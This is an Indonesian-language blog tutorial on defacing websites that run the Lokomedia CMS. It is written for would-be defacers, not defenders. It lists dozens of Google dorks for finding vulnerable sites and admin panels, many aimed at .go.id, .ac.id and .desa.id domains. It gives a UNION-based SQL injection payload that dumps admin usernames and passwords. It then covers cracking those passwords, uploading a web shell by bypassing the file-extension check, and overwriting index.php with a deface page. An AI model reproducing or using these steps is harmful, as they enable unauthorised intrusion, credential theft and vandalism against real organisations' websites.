Cara Deface Dengan Sql Lokomedia Full + Dork Terupdate

Unknown   December 01, 2016   Deface   Comment  

Malam Guys, Kali ini saya akan men-share tutorial SQL Lokomedia,Tutorial ini sangan mudah di gunakan pada Defacer :D Oke langsung aja :D

ini alat Temvurnya  Sob,,, :D

   Bahan :

A. Dork
B. Script deface : Disini
C. Shell : Disini
D. Kopi & Rokok biar gak panik gan :V :V :V

1. Dork :  

        inurl:statis-1-profil.html
        inurl:statis-2-profil.html
        inurl:statis-3-strukturorganisasi.html

intext:lokomedia inurl:statis- ext:html
intext:lokomedia inurl:kategori- 6 - .html
intext:lokomedia inurl:semua- ext:html
inurl:kategori-32-daerah.html site:.com
intext:copyright by  inurl:statis-1 ext:html

        intext:lokomedia inurl:statis- ext:html
        intext:lokomedia inurl:semua- ext:html
        intext:lokomedia inurl:hubungi- ext:html
        intext:lokomedia inurl:kategori- ext:html
        intext:lokomedia inurl:berita- ext:html
   inurl:foto_info
     inurl:foto_produk intext:shop
     inurl:foto_banner intext:shop
     inurl:foto_berita intext:shop
     inurl:foto_user intext:shop
     inurl:/adminweb/login "Halaman Login"

         inurl:content.php?module=banner
          inurl:content.php?module=user
         inurl:content.php?module=berita
         inurl:content.php?module=iklan
         inurl:content.php?module=produk

intext:copyright @ "Developed by"  inurl:/berita- - ext:html site:.
intext:Kembali ke Website Utama
intext:Developed by  inurl:berita- ext:html
"Developed by"  inurl:/statis-1- ext:html site:.
 inurl:/statis-10 ext:html
 inurl:/statis-16 ext:html
intext:copyright @ "Developed by"  inurl:/berita- - ext:html site:.
intext:Kembali ke Website Utama
intext:Developed by  inurl:berita- ext:html
intext:copyright by  inurl:statis-1 ext:html
inurl:/semua-berita.html site:coli :V "Total Pengunjung Hari Ini"

intext:copyright @ "Developed by"  inurl:/berita- - ext:html site:.
intext:Kembali ke Website Utama
intext:Developed by  inurl:berita- ext:html
"Developed by"  inurl:/statis-1- ext:html site:.
"Developed by"  inurl:/statis-1- ext:html site:.com/net/id/coli :V
Copyright © 2013 by Polostama. All rights reserved.
 inurl:media.php?module=home
            
 #Selebihnya kembangin Sendiri dengan Otak Hentai Lu,,, :D  

  2. Exploit SQLi (SQL Injection) :

           
www.target.co.li/Kategori- : 'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--
                        
 www.target.co.li/statis- : 'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+

 

===============....Cara nya Mangga Resapi :V.....================

  

  1. Cari target dahulu , sebagai contoh nya ,saya menggunakan DORK
    statis-1-profil.html lalu search di GOOGLE nanti akan banyak 
    SITE nya . :D

2.  Buka Website tersebut , Contoh http://site. com/statis-1-pengantar.html
 
    lalu masukan Exploit nya di  http://site.com/statis--1'union select  /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

Kalau ane dapatnya yang http://target.com/berita-blabl-ablabla-blabla{-}nla.html
exploitnya di dalam kurung yah,, kaya gambar ini,, :D

tuh,, Muncul deh Kode Buat Colinnya :V

3. Tinggal di decrypt deh di  disini :V 

4 . jika password tersebut di temukan carilah admin login nya dengan Imajinasi,,, biasannya
di
/admin/
/adminweb/
/administrator/
/redaktur/

DORK PAGE LOGIN :

intext:Developed by  inurl:berita- ext:html
intitle:.:: Administrator -  Website ::. intext:LOGIN ADMINISTRATOR "BATALKAN"
intittle:adminstration login lokomedia site:go.id
intitle:.:: Administrator -  Website ::. intext:LOGIN ADMINISTRATOR site:.ac.id
  intittle:adminstration login lokomedia site:go.id
intitle:.:: Administrator -  Website ::. intext:LOGIN ADMINISTRATOR site:.ac.id
             intittle:Administrator CMS Lokomedia
             intittle:..::: Login Anggota :::..
             intitle:.:: HALAMAN ADMINISTRATOR ::.
             intittle:..::: Login Elearning :::..
             intittle:..::: Login Administrator :::.. site:go.id
             intittle:.:: Login Adminstration ::. site:go.id
             intittle:..::: Login Sistem ::.. site:go.id
             intittle:.:: ADMINISTRATOR LOGIN ::. site:go.id
             intittle:adminstration > login site:go.id
              intittle:adminstration > Website site:go.id
              intitle:Panel Administrator

         inur:.com/adminweb "Username"
        inur:.org/adminweb "Username"
        inur:.net/adminweb "Username"
        inur:.go.id/adminweb "Username"
        inur:.desa.id/adminweb "Username"
        inur:.co.id/adminweb "Username"
        inur:.web.id/adminweb "Username"
        inur:/adminweb "Username"
 
6.Anggap saja page loginnya dah ketemu,,, :V 

7. Truzzzzz,,, login Hasil Coli lo,, dengan Pw tadi,,,

8.Untuk Uploud Shellnya Di Download,, biasakan yang .phtml atau Menggunakan Tamper Data jadi Ruba File Shellnya jadi Shell.php.jpg Terus KLIK Tamper Hapus yang .jpg di Sebelah Kanan Kolom nya Dan Klik Oke-Oke terus,, 
 Hingga Uploud Sukses :V,,

 

10. Anggap aja dah Tertanam,,, :V ,, Panggil Shellnya contoh http://target.com/files/shellkamu.phtml ia kamuu.. :V

11Setelah itu cari Halaman yang /public_html/ Cari File nya yang Index.php atau Media.php

#UTAMAKAN BACK_UP tinggal Rename aja File Aslinnya,, Ganti Dengan Script Deface Lo,, 

12. Dan Lihat ,, :V

Mudah and Simpelkan :V Mungkin Itu Saja Yang Bisa Admin Bagikan,,

Walau Lokomedia ini sudah Ngetren dari Dulu,, 

Tapi Ingat "Imajinasi Itu Tak Terbatas" ,,,,, :V

Mohon Jangan Berlebihan Dengan Sql Lokomedia ini ,, because,, asikk :V ,,

Buanyak Site Indo Menggunakan Lokomedia,, :V 

#COPAS IJIN + SERTAKAN LINK COK